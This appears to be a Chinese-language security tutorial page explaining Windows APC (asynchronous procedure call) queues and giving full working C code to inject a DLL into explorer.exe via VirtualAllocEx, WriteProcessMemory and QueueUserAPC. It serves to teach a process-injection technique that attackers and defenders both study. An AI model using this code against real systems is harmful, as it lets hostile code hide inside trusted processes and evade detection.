APC Injection

APC简介
一个异步过程调用（APC）的是，在一个特定的线程的上下文中以异步方式执行的功能。当APC排队到线程中时，系统会发出软件中断。下次调度线程时，它将运行APC功能。系统生成的APC称为内核模式APC。由应用程序生成的APC称为用户模式APC。线程必须处于可警报状态才能运行用户模式APC。
每个线程都有自己的APC队列。应用程序通过调用QueueUserAPC函数将APC排队到线程中。调用线程在对QueueUserAPC的调用中指定APC函数的地址。APC的排队是对线程调用APC函数的请求。
当用户模式APC排队时，除非它处于警报状态，否则不会将其排队的线程定向到调用APC函数。当线程调用SleepEx，SignalObjectAndWait，MsgWaitForMultipleObjectsEx，WaitForMultipleObjectsEx或WaitForSingleObjectEx函数时，它将进入可警告状态。如果在APC排队之前满足了等待，线程将不再处于可警告的等待状态，因此将不执行APC功能。但是，APC仍在排队，因此当线程调用另一个可警告的等待函数时，将执行APC函数。ReadFileEx，SetWaitableTimer，SetWaitableTimerEx，和WriteFileEx功能使用APC作为完成通知回调机制来实现。
简单的说，由于在线程执行过程中，其他线程无法干预当前执行线程(占用cpu)，如果需要干预当前执行线程的操作，就需要有一种让线程自身去调用的机制，windows实现了一种称之为APC的技术，这种技术可以通过插入队列(执行信息)让线程在一定条件下自己去调用，这样就实现了异步操作。
线程是不能被“杀掉”、“挂起”、“恢复”的,线程在执行的时候自己占据着CPU,别人怎么可能控制它呢?
举个极端的例子:如果不调用API,屏蔽中断,并保证代码不出现异常,线程将永久占用CPU,何谈控制呢?所以说线程如果想“死",一定是自己执行代码把自己杀死,不存在“他杀”这种情况!
那如果想改变一个线程的行为该怎么办呢?
可以给他提供一个函数,让它自己去调用,这个函数就是APC (Asyncroneus Procedure Call),即异步过程调用。
注入流程
1.从进程名确定PID
2.从PID确定TID
3.写入必要代码
4.插入APC队列
代码实现
1
#include<Windows.h>
2
#include<stdio.h>
3
#include <Tlhelp32.h>
4
​
5
DWORD GetProcessIdByName(LPCTSTR lpszProcessName)
6
{
7
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
8
	if (hSnapshot == INVALID_HANDLE_VALUE)
9
	{
10
		return 0;
11
	}
12
​
13
	PROCESSENTRY32 pe;
14
	pe.dwSize = sizeof pe;
15
​
16
	if (Process32First(hSnapshot, &pe))
17
	{
18
		do {
19
			if (lstrcmpi(lpszProcessName, pe.szExeFile) == 0)
20
			{
21
				CloseHandle(hSnapshot);
22
				return pe.th32ProcessID;
23
			}
24
		} while (Process32Next(hSnapshot, &pe));
25
	}
26
​
27
	CloseHandle(hSnapshot);
28
	return 0;
29
}
30
​
31
​
32
BOOL GetAllThreadIdByProcessId(DWORD dwProcessId)
33
{
34
​
35
	DWORD dwBufferLength = 1000;
36
	THREADENTRY32 te32 = { 0 };
37
	HANDLE hSnapshot = NULL;
38
	BOOL bRet = TRUE;
39
​
40
​
41
	// 获取线程快照
42
	::RtlZeroMemory(&te32, sizeof(te32));
43
	te32.dwSize = sizeof(te32);
44
	hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
45
​
46
	// 获取第一条线程快照信息
47
	bRet = ::Thread32First(hSnapshot, &te32);
48
	while (bRet)
49
	{
50
		// 获取进程对应的线程ID
51
		if (te32.th32OwnerProcessID == dwProcessId)
52
		{
53
			return te32.th32ThreadID;
54
		}
55
​
56
		// 遍历下一个线程快照信息
57
		bRet = ::Thread32Next(hSnapshot, &te32);
58
	}
59
	return 0;
60
}
61
​
62
int main() {
63
	FARPROC pLoadLibrary = NULL;
64
	HANDLE hThread = NULL;
65
	HANDLE hProcess = 0;
66
	DWORD Threadid = 0;
67
	DWORD ProcessId = 0;
68
	BYTE DllName[] = "C:\\Users\\Black Sheep\\source\\repos\\ApcInject\\x64\\Debug\\TestDll.dll";
69
	LPVOID AllocAddr = NULL;
70
​
71
	ProcessId = GetProcessIdByName(L"explorer.exe");
72
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessId);
73
	pLoadLibrary = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
74
	AllocAddr = VirtualAllocEx(hProcess, 0, sizeof(DllName) + 1, MEM_COMMIT, PAGE_READWRITE);
75
	WriteProcessMemory(hProcess, AllocAddr, DllName, sizeof(DllName) + 1, 0);
76
	Threadid = GetAllThreadIdByProcessId(ProcessId);
77
	hThread = OpenThread(THREAD_ALL_ACCESS, 0, Threadid);
78
	QueueUserAPC((PAPCFUNC)pLoadLibrary, hThread, (ULONG_PTR)AllocAddr);
79
	CloseHandle(hProcess);
80
	CloseHandle(hThread);
81
	return 0;
82
​
83
}
Copied!
LINKS
​

代码与进程注入 - 以前

CreateRemoteThread

下一个 - 代码与进程注入

Mapping Injection

最近更新 1yr ago

复制链接

内容